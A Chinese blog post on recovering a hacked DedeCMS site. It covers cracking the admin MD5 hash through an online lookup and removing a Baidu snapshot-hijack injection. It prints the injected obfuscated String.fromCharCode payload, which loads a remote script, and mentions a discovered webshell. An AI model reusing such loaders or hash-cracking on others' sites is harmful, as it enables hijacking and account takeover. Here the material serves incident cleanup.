阿里云的輕量級服務器、新網的域名、dedecms

篡改密碼

被篡改密碼，可以使用一些數據庫管理的工具來查看被改的密碼，我這里用的是phpmyadmin

http://域名/phpMyAdmin

輸入自己的數據庫賬號和密碼（默認都是root），我這里是阿里云的密碼

點擊默認生成的數據庫里面的默認存放管理員的賬號、密碼dede_admin
里面的uname為賬號，pwd為密碼（md5值），用下方的在線解密

https://www.somd5.com/

拿著解開的密碼去登陸就OK了

百度快照劫持

發現的過程：

如上方可見，點擊進去就會跳轉到bc網站。
打開我們網站的源代碼（f12）可見：

看似是亂碼，其實是unicode編碼

解碼：

這里則是百度后（String.fromCharCode）

fromCharCode() 可接受一個指定的 Unicode 值，然后返回一個字符串

把下面的代碼保存到一個html文件，把數字輸入進去然后打開

<!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body><p id="a">出現吧！</p><script>var n=String.fromCharCode(115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,100,100,46,106,115,34,62,47,115,99,114,105,112,116,62);document.getElementById("a").innerHTML=n; </script></body> </html>

得到以下網址，打開得到以下界面：
百度了一下才知道是百度快照劫持，那么我們怎么解決呢，百度啊！
解決辦法：
下面是我的解決方法：先打開ftp然后打開存在哪些html的源碼，清除之后可以看到整個世界都清凈了

然后我們可以打包源碼到本地，然后用一些殺毒軟件和一些安全狗、D盾等，這里我用的是火絨

點擊病毒查殺----自定義查殺-----選擇打包的源碼等文件

或者看看根目錄是否存在一些你網站本來沒有的東西

可以看到這里有個aaa.php就是一個免殺的木馬，奈斯，直接獲得一枚，有發現木馬的可以給我：3075999532

總結

以上是生活随笔為你收集整理的百度快照劫持的解决方法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。